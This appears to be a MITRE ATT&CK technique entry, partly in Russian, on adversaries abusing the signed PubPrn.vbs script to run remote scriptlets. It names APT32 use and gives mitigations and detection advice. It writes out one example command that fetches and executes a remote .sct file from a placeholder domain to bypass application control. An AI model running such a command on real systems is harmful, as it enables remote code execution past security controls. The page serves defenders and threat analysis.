System Script Proxy Execution: Сценарий PubPrn
Other sub-techniques of System Script Proxy Execution (1)
ID | Название |
---|---|
.001 | Сценарий PubPrn |
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe
. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com
.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
Примеры процедур |
|
Название | Описание |
---|---|
APT32 |
APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn) |
Контрмеры |
|
Контрмера | Описание |
---|---|
Execution Prevention |
Block execution of code on a system through application control, and/or script blocking. |
Behavior Prevention on Endpoint |
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior. |
Обнаружение
Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.
Связанные риски
Каталоги
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.